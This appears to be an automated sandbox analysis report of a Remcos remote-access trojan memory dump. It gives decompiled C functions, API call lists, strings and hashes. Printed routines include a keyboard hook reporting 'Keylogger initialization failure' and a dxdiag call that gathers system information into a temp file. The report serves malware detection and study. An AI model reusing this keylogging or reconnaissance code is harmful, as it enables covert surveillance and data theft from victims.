0x00784bcb
0x00784bd5
0x00784bdc
0x00784bdf
0x00784be6
0x00784bed
0x00784c19
0x00784c3f
0x00784c41
0x00000000
0x00784c1b
0x00784c1e
0x00784ce5
0x00784cf1
0x00784cfc
0x00784d01
0x00784c24
0x00784c2b
0x00784c30
0x00784c36
0x00784c3c
0x00000000
0x00784c3c
0x00784c36
0x00784c1e
0x00784bef
0x00784bf3
0x00784bf6
0x00784bfc
0x00784bfe
0x00784c01
0x00784c05
0x00784c42
0x00784c45
0x00784c46
0x00784c4b
0x00784c51
0x00784c57
0x00784c66
0x00784c6c
0x00784c72
0x00784c77
0x00784c7f
0x00784c93
0x00784d06
0x00784d0c
0x00784c95
0x00784c9d
0x00784ca6
0x00784cac
0x00000000
0x00784cae
0x00784cb0
0x00784cb3
0x00784cb7
0x00784ccc
0x00000000
0x00784cce
0x00784cd2
0x00784cd4
0x00784cd7
0x00000000
0x00784cd7
0x00784cd2
0x00784ccc
0x00784cac
0x00784ca6
0x00784c93
0x00784c77
0x00784c51
0x00000000
0x00784cda
0x00784cda
0x00784d0e
0x00784d20

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007852E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00784BB0
__fassign.LIBCMT ref: 00784C2B
__fassign.LIBCMT ref: 00784C46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00784C6C
WriteFile.KERNEL32(?,FF8BC35D,00000000,Rx,00000000,?,?,?,?,?,?,?,?,?,007852E3,?), ref: 00784C8B
WriteFile.KERNEL32(?,?,00000001,Rx,00000000,?,?,?,?,?,?,?,?,?,007852E3,?), ref: 00784CC4

Strings

Rx, xrefs: 00784C7F, 00784CB7, 00784C82, 00784CBA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: Rx
API String ID: 1324828854-845304388
Opcode ID: 7569778cda244fde1790649311bbf26b053fb4882dea88b516b7ee93dcd45035
Instruction ID: 812a42827fa0981ea2b01e5275949dedf48a73a3099d07228c349b86f94e701c
Opcode Fuzzy Hash: 7569778cda244fde1790649311bbf26b053fb4882dea88b516b7ee93dcd45035
Instruction Fuzzy Hash: F651E671A0024AAFCB10DFA8DC89AEEBBF8FF49300F14415AE556E7251E778D941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00753673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00753673(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E007430A6(_t54,  &_v76, E0074427F(_t54,  &_v52, E0077987F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				E00741EF0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00741EEB(E00749E69( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				E00741EF0();
				E007420D5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = E00741EEB( &_v76);
					_t87 =  &_v28;
					E007579DC(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (E00749DB5() != 0 && _t92 < 0x4b0);
				if(E00749DB5() == 0) {
					DeleteFileW(E00741EEB( &_v76));
					E0074484E(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x7abacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E00744A08(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						E00742F93(_t55, _t95 - 0x18, E00742FB7( &_v52,  &_a4, 0x7ac238), _t102,  &_v28);
						_push(0x97);
						E00744AA4(_t55,  &_v180, _t49, _t102);
						E00741FC7();
						E00744E0B( &_v180);
						_t55 = 1;
					}
					E00744E2F(_t55,  &_v180, _t93);
				}
				E00741FC7();
				E00741EF0();
				E00741FC7();
				return _t55;
			}

0x00753673
0x0075369d
0x007536a6
0x007536ab
0x007536d4
0x007536dd
0x007536e5
0x007536ea
0x007536ec
0x007536ef
0x007536f4
0x007536f9
0x00753700
0x00753709
0x0075370f
0x00753725
0x00753734
0x00753742
0x00753747
0x00753752
0x00753757
0x00753758
0x00753759
0x0075375a
0x0075375b
0x00753760
0x00753762
0x0075376a
0x00753782
0x00753788
0x00753793
0x0075379b
0x007537a6
0x007537ab
0x007537ab
0x007537b3
0x007537b3
0x007537bb
0x007537c3
0x007537cb
0x007537d8

APIs

Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 007536D4

Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9

Sleep.KERNEL32(00000064), ref: 00753700
DeleteFileW.KERNEL32(00000000), ref: 00753734

Strings

/t , xrefs: 007536B3
open, xrefs: 007536CE
dxdiag, xrefs: 007536C9
\sysinfo.txt, xrefs: 0075367F
temp, xrefs: 00753684

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: ee6c5af89efab2af723abd6c36b5589f27df1e5f4cb86bfa7738dc5873327c78
Instruction ID: 9824d8411f2ce8e63fe983cd46f24314284df2cc1df3c0f282ff6f1ddd2bea54
Opcode Fuzzy Hash: ee6c5af89efab2af723abd6c36b5589f27df1e5f4cb86bfa7738dc5873327c78
Instruction Fuzzy Hash: E7319371910218EBCB14FBA4DC9AEFF7735AF51300F800529F90567192EF685A8ACA91

Uniqueness

Uniqueness Score: -1.00%

Function 0074EAF4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0074EAF4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v28;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;

				E00770058( &_v12, 0);
				_t39 =  *0x7adb88;
				_v8 = _t39;
				_t41 = E0074BA23(_a4, E0074B94C(0x7add40));
				if(_t41 != 0) {
					L5:
					E007700B0( &_v12);
					return _t41;
				} else {
					if(_t39 == 0) {
						__eflags = E0074EBBB(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t9 =  &_v28; // 0x74e459
							_t34 = _t9;
							E0074B812(_t34);
							_t10 =  &_v28; // 0x74e459
							E0077205A(_t10, 0x7a864c);
							asm("int3");
							_push(_t41);
							_t42 = _t34;
							E0074B6F3(_t34, _v36);
							 *_t42 = 0x794290;
							return _t42;
						} else {
							_t41 = _v8;
							 *0x7adb88 = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E00770269(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t39;
						goto L5;
					}
				}
			}

0x0074eb01
0x0074eb06
0x0074eb11
0x0074eb22
0x0074eb26
0x0074eb5a
0x0074eb5d
0x0074eb69
0x0074eb28
0x0074eb2a
0x0074eb3e
0x0074eb41
0x0074eb6a
0x0074eb6a
0x0074eb6d
0x0074eb77
0x0074eb7b
0x0074eb80
0x0074eb84
0x0074eb88
0x0074eb8a
0x0074eb8f
0x0074eb99
0x0074eb43
0x0074eb43
0x0074eb48
0x0074eb50
0x0074eb54
0x00000000
0x0074eb59
0x0074eb2c
0x0074eb2c
0x00000000
0x0074eb2c
0x0074eb2a

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0074EB01
int.LIBCPMT ref: 0074EB14

Part of subcall function 0074B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0074B95D
Part of subcall function 0074B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0074B977

std::locale::_Getfacet.LIBCPMT ref: 0074EB1D
std::_Facet_Register.LIBCPMT ref: 0074EB54
std::_Lockit::~_Lockit.LIBCPMT ref: 0074EB5D
__CxxThrowException@8.LIBVCRUNTIME ref: 0074EB7B
std::exception::exception.LIBCMT ref: 0074EB8A

Strings

Yt, xrefs: 0074EB6A, 0074EB77, 0074EB7A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
String ID: Yt
API String ID: 2287991272-3040663348
Opcode ID: 6335b2b3faf0d0a5d50176f7e2e6aa3a448c20aa580e92d43a3f59e4f3928573
Instruction ID: 43b706998d3ad8b05def8cd5b56e8177bc106fece4fd00c3ed81c1c975a0283d
Opcode Fuzzy Hash: 6335b2b3faf0d0a5d50176f7e2e6aa3a448c20aa580e92d43a3f59e4f3928573
Instruction Fuzzy Hash: A011A772A00118EBCB14ABA8D809DEE7768EF41770B114169F905A7291DF78DE01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00748892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00748892(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x7abaf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0074887B, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E00757226(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E007475C2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00742084(_t22, _t39 - 0x14, "[ERROR]");
						E00756C80(_t22, 0);
						E00741FC7();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x00748898
0x0074889c
0x007488a1
0x007488a9
0x00000000
0x007488ab
0x007488bb
0x007488c1
0x007488c3
0x007488c5
0x0074890d
0x0074890d
0x00748915
0x0074891b
0x0074891d
0x00000000
0x00000000
0x00748924
0x0074892f
0x00748935
0x00748937
0x00000000
0x00000000
0x00000000
0x00748937
0x00748939
0x00748939
0x007488c7
0x007488d3
0x007488d8
0x007488e3
0x007488f2
0x007488f7
0x00748903
0x0074890a
0x0074890a
0x007488c5
0x00748940

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 007488AD
SetWindowsHookExA.USER32 ref: 007488BB
GetLastError.KERNEL32 ref: 007488C7

Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A

GetMessageA.USER32 ref: 00748915
TranslateMessage.USER32(?), ref: 00748924
DispatchMessageA.USER32 ref: 0074892F

Strings

[ERROR], xrefs: 007488ED
Keylogger initialization failure: error , xrefs: 007488DB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: d0b39bcf651d9a3cae98539cfbf954e98142f741b5420a75bc7dd982e7e5ae97
Instruction ID: 86b5a3922562201074eb2e142370b15fda6a55ed443b3abf16f05259b67cec8a
Opcode Fuzzy Hash: d0b39bcf651d9a3cae98539cfbf954e98142f741b5420a75bc7dd982e7e5ae97
Instruction Fuzzy Hash: FF11A372600645ABC7107B75AD0E86B77ECEB96B11B40462EF891C2150EF78D915C763

Uniqueness

Uniqueness Score: -1.00%

Function 00758D28, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00758D28(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x7abec4 = E00758DDA();
				0x7abec0->cbSize = 0x1fc;
				 *0x7abec8 = 1;
				 *0x7abed0 = 0x401;
				 *0x7abed4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x7abed8, "Remcos", 0x80);
				 *0x7abecc = 7;
				Shell_NotifyIconA(0, 0x7abec0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x00758d41
0x00758d4c
0x00758d5a
0x00758d64
0x00758d6e
0x00758d8d
0x00758d92
0x00758d9e
0x00758da8
0x00758dc4
0x00758dcb
0x00758dd3
0x00000000
0x00000000
0x00758db4
0x00758dbe
0x00758dbe
0x00758dd9

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00758D41

Part of subcall function 00758DDA: RegisterClassExA.USER32(00000030), ref: 00758E26
Part of subcall function 00758DDA: CreateWindowExA.USER32 ref: 00758E41
Part of subcall function 00758DDA: GetLastError.KERNEL32 ref: 00758E4B

ExtractIconA.SHELL32(00000000,?,00000000), ref: 00758D78
lstrcpynA.KERNEL32(007ABED8,Remcos,00000080), ref: 00758D92
Shell_NotifyIconA.SHELL32(00000000,007ABEC0), ref: 00758DA8
TranslateMessage.USER32(?), ref: 00758DB4
DispatchMessageA.USER32 ref: 00758DBE
GetMessageA.USER32 ref: 00758DCB

Strings

Remcos, xrefs: 00758D83

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: fa935162bd4ccef8322e8758a75b32d26f4f7262552324233d26932d953d223c
Instruction ID: abf6f0a4b0febd0b25e3b69d1a76b296f37b9967b4ebaa5e61c1676477fc4f41
Opcode Fuzzy Hash: fa935162bd4ccef8322e8758a75b32d26f4f7262552324233d26932d953d223c
Instruction Fuzzy Hash: 730144B1544248ABD7509FA5EC0DEEB7BBCFBC7701F00811AF601921A1DBFC950A8B58

Uniqueness

Uniqueness Score: -1.00%

Function 00786532, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00786532(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0077A4F1();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0077A504())) = 9;
						L59:
						_t145 = E0077695D();
						goto L60;
					}
					__eflags = _t213 -  *0x7aba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x7ab800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0077F98C(_t224, _t158);
								E007801F5(0);
								E007801F5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00785A9E(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x7ab800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x7ab800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0078E817(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0077A4CE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0077A504())) = 9;
											 *(E0077A4F1()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0078608E();
												} else {
													_t176 = E0078639E();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0078624E(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x7ab800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0077A504())) = 0xc;
									 *(E0077A4F1()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E007801F5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0077A4F1()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0077A504())) = 0x16;
							E0077695D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0077A4F1()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0077A504())) = 0x16;
					goto L59;
				} else {
					 *(E0077A4F1()) =  *_t212 & 0x00000000;
					_t145 = E0077A504();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x0078653b
0x00786542
0x0078655c
0x0078655e
0x007868c6
0x007868c6
0x007868cb
0x007868cb
0x007868d3
0x007868d9
0x007868d9
0x00000000
0x007868d9
0x00786564
0x0078656a
0x00000000
0x00000000
0x00786572
0x0078657e
0x00786581
0x00786584
0x00786587
0x0078658e
0x00786591
0x00786595
0x00786598
0x0078659b
0x00000000
0x00000000
0x007865a1
0x007865a4
0x007865aa
0x007865c4
0x007865c6
0x007868c2
0x00000000
0x007868c2
0x007865cc
0x007865d0
0x00000000
0x00000000
0x007865d6
0x007865da
0x00000000
0x00000000
0x007865e1
0x007865e5
0x007865e8
0x007865eb
0x007865f0
0x007865f0
0x007865f3
0x00786610
0x00786615
0x00786617
0x00786619
0x00786639
0x0078663a
0x0078663c
0x0078663f
0x00786641
0x00786643
0x00786645
0x00786645
0x00786650
0x00786652
0x00786659
0x0078665e
0x00786661
0x00786664
0x00786666
0x0078668b
0x00786690
0x00786697
0x0078669a
0x0078669d
0x007866a1
0x007866a3
0x007866a7
0x007866a9
0x007866ac
0x007866af
0x007866b1
0x007866b4
0x007866bb
0x007866be
0x007866c3
0x007866c6
0x007866cf
0x007866d3
0x007866d6
0x007866d9
0x007866dc
0x007866e2
0x007866e4
0x007866ed
0x007866f0
0x007866f3
0x007866f6
0x007866f7
0x007866fb
0x00786701
0x0078670b
0x00786710
0x00786720
0x00786724
0x00786727
0x00786729
0x0078672b
0x0078672d
0x0078672f
0x00786737
0x00786738
0x0078673b
0x0078673e
0x0078673f
0x00786745
0x0078674f
0x00786757
0x0078675a
0x00786766
0x0078676a
0x0078676d
0x0078676f
0x00786771
0x00786773
0x00786775
0x0078677d
0x0078677e
0x00786781
0x00786784
0x00786784
0x00786785
0x0078678b
0x00786795
0x00786795
0x00786773
0x0078676f
0x0078675a
0x0078672d
0x00786729
0x00786710
0x007866e4
0x007866dc
0x0078679b
0x007867a1
0x007867a3
0x00786816
0x00786816
0x0078681a
0x0078682a
0x00786830
0x00786832
0x0078688e
0x0078688e
0x00786896
0x00786897
0x00786899
0x007868b2
0x007868b5
0x007867f2
0x007867f3
0x00000000
0x007867f8
0x007868bb
0x00000000
0x007868bb
0x007868a0
0x007868ab
0x00000000
0x007868ab
0x00786834
0x00786837
0x0078683a
0x00000000
0x00000000
0x0078683c
0x0078683c
0x0078683f
0x00786842
0x00786845
0x0078684c
0x00786851
0x00786853
0x00786857
0x00786872
0x00786876
0x00786877
0x0078687a
0x0078687b
0x00786887
0x0078687d
0x0078687d
0x0078687d
0x00786859
0x00786859
0x00786859
0x00786864
0x00786869
0x0078686c
0x0078686c
0x00000000
0x00786851
0x007867a8
0x007867ab
0x007867b2
0x007867b7
0x00000000
0x00000000
0x007867c0
0x007867c6
0x007867c8
0x00000000
0x00000000
0x007867ca
0x007867ce
0x00000000
0x00000000
0x007867e2
0x007867e8
0x007867ea
0x0078680e
0x00786811
0x00000000
0x00786811
0x007867ec
0x00000000
0x00786668
0x0078666d
0x00786678
0x007867f9
0x007867f9
0x007867f9
0x007867fc
0x007867fd
0x00000000
0x00786805
0x00786666
0x0078661b
0x00786620
0x00786627
0x0078662d
0x00000000
0x0078662d
0x007865f5
0x007865f8
0x00786602
0x00786602
0x00786605
0x00786608
0x00000000
0x00786608
0x007865fc
0x007865fe
0x00786600
0x00000000
0x00000000
0x00000000
0x00786600
0x007865ac
0x007865b1
0x007865b9
0x00000000
0x00786544
0x00786549
0x0078654c
0x00786551
0x007868de
0x00000000
0x007868de

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 793efe8f2169afac88426fb2318154ce1714a0c468934b6ac32728bc491ef64e
Instruction ID: 47841f31f3c0d3bb5befefe111c3a5b8c7ac8f1603f9f797b34797ee330a4700
Opcode Fuzzy Hash: 793efe8f2169afac88426fb2318154ce1714a0c468934b6ac32728bc491ef64e
Instruction Fuzzy Hash: 90C1D3B4E44249BFDF11EFACC845BADBBB4AF49310F188198E505A7392D73C9941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0078E8D5, Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0078E8D5(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
